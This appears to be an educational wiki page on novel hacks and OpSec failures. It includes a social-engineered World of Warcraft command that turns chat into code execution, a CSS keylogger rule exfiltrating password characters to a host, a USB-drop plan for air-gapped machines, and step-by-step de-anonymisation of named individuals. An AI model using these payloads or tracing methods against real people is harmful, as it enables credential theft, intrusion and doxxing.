Cyber Attacks

From Teach The Net
Jump to: navigation, search

Novel Hacks

World of Warcraft: RemoveExtraSpaces

World of Warcraft supports add-ons to their interface in the Lua script language. Because of this, they have a robust api for these add-ons to use.

For this attack, the attacker must convince the player to enter one single command into their chat window:

/run RemoveExtraSpaces=RunScript

In this command, '/run' says to interpret what follows as a Lua script, 'RemoveExtraSpaces' is a built-in function that removes extra spaces from text, and 'RunScript' in a built-in function that executes text as Lua script (similar to eval in javascript).

The function 'RemoveExtraSpaces' is executed on every chat message a player receives, so in effect the above command causes every chat message the player receives to be executed as though it's Lua script.

Now the attacker can simply whisper the victim player to cause the user's interface to do anything he wishes, or to extract information about the player. He can (for example), extract the current player's location in game from his UI, approach the player in game, and then open a trade with the player and force the player's UI to hit the accept button.


CSS Keylogger

Concept (repeat for every ascii character):

input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  • Works for password inputs that update 'value' attribute with the typed in value, a common pattern in React.
  • For password managers like LastPass, you can get the first character with [value^=a], the last value [value$=a], and anywhere in the string [value*=a]. Could target like first two and last two and any in middle with around 13000 combinations.

Open Source Lib

Jumping Airgaps

Guri and his fellow Ben-Gurion researchers have shown, for instance, that it's possible to trick a fully offline computer into leaking data to another nearby device via the noise its internal fan generates, by changing air temperatures in patterns that the receiving computer can detect with thermal sensors, or even by blinking out a stream of information from a computer hard drive LED to the camera on a quadcopter drone hovering outside a nearby window. In new research published today, the Ben-Gurion team has even shown that they can pull data off a computer protected by not only an air gap, but also a Faraday cage designed to block all radio signals.
- Quoted from Schneier's blog, which quotes from here

Page with all research results

Overall concept:

  • Drop a USB drive with malware in a parking lot. Employee picks it up, and sticks it in an air gapped machine to see what's on it. This infects that machine.
  • Now we have a machine not connected to the internet that is infected... use one of the proposed concepts above to exfiltrate the data.

OpSec Violations

Marcus Hutchins [Sept 2017]

Flipertyjopkins uploads video to Youtube 8 years ago instructing viewers how to use Hotmail cracker v1.3. Investigative Journalist Brian Krebs notes that at 2:48 mark in video, an MSN Chat Window shows up that clearly shows the user is logged in as "[email protected]", thus linking Flipertyjopkins to Marcus Hutchins.


eBay Scammer [Sept 2016]

Person had $500 Apple gift card, wanted to sell for bitcoin due to lack of chargebacks.

Several potential buyers, all wanted it for 50% or less of card's worth. Found one willing to pay 75% on reddit darkmarket.

Seller sends card numbers for buyer to verify balance + details on how to verify identity (news article about winner of competition, clicking blog post link in article takes to winner's blog, click about me page lists social usernames one of which is reddit account communication is taking place on).

Buyer says seller could have just bought that reddit account, insists on not going first, says has eBay account with high positive feedback and will prove it. Seller says you could have bought eBay account, buyer replies can't due to lockout on geo/ip changes. Buyer sends seller message to prove his owning of account with high rep.

Seller sends pins for cards + bitcoin address for payment + pictures of card hosted on his site + tracking number for mailed cards.

Buyer deletes his reddit account to stop communication. Seller messages him on eBay, buyer on eBay claims his account was hacked and it wasn't him.

Seller decides to track buyer/scammer down. From the scammer's eBay account, the seller had a username + city location. From the scammer's reddit account, the seller had a username.

A google search for the scammer's reddit and eBay usernames uncovered a Steam account which used both names, confirming it was not a hacked eBay account but the same person who went by two nicknames. The google search also uncovered a profile on a looking-for-job website which contained the scammer's first name, first letter of last name, and city location (which matched the one on eBay).

Seller had sent buyer an image of the cards. Scammer had opened it, which gave the seller the scammer's IP address and city (which again matched the one on eBay).

Seller now did a Facebook search for scammer's ebay username. In the text post of a random gamer, seller sees the message "Good games last night on LoL <scammer_ebay_username>". Unfortunately link to profile wasn't link, only text due to privacy settings of linked user.

Seller looked at this random gamer's profile, scrolled through 4 years of posts, and found a screenshot that random gamer posted that had the scoreboard from LoL (League of Legends) in the foreground AND facebook chat open in the background, with the scammer's full name visible (matching the first name plus first letter of last name seller got from the job website). So from this, seller discovered scammer's full first and last name.

Seller now did a Facebook search of scammer's last name and city, and found the scammer's mother. He sent the scammer's mother a Facebook message.


vDos [Sept 2016]

Investigator was analyzing random ddos-for-hire site PoodleStresser. He found a vulnerability, which allowed downloading config data on the site. This data showed PoodleStresser connects to api of ddos-for-hire site vDOS to power their attacks (so PoodleStresser is just a reseller of vDOS).

vDos is a much larger site of the same ilk, hidden behind cloudflare (so the site's true IP is not known). Using the downloaded config data from PoodleStresser gave the investigator api access to vDos. The investigator found a serious vulnerability in the api of vDos that allowed dumping vDos' database and config files, as well as obtaining the true IP address of vDos (which pointed to four rented servers in Bulgaria at

From the vDos dumped database, all tech support tickets were extracted. From these support tickets, it was discovered that all attacks vDos clients attempted to make against Israel failed (suggesting owners were in Israel trying to avoid attention of Israeli authorities). Additionally, the vDos owners' online nicknames were found in the support tickets as P1st0 and AppleJ4ck.

From the vDos extracted config files, it was discovered that the site was configured to blast text messages to 6 phone numbers (two of which are Israeli) whenever support ticket of high level created via SMS service online called Of the two Israeli phone numbers, one was tracked via Whitepages online to an Israeli named Yarden Bidani, while the other was connected via WhoIs records to the domain under the name Itay Huri. It was also discovered that the site was configured to send support emails to [email protected], [email protected] and [email protected]

A reverse IP lookup found several other sites running on the same IP as vDos. A whoIS lookup on these domains found one of them registered to a phone number matching one of the phone numbers vDos' config files blasted out text messages to.

A google search for the owner's aliases (that were discovered in the tech support tickets) found listings they made on places like, peddling warez and services.


KickAss Torrents [July 2016]

The feds track the owner of KAT through a variety of methods, though mostly through accessing bank and server records.

Possible angle: Client had a website, which Feds saw pointed to IP Address A reverse DNS lookup on showed several other domains hosted at the same IP address (many of which just proxied the main site). One of those other domains was old, and the whois record for it was not privacy protected and thus leaked the true owner's name, address, phone, and email. The email from this domain was used for an Apple account that purchased something on iTunes using a specific IP address (that wasn't hidden behind a proxy). Same IP address was person managing Facebook page for KAT. Coinbase account to collect bitcoin donations also tied to same email address, and bitcoin address behind Coinbase account was on KAT website for donations.

[Article 1, Article 2, Article 3]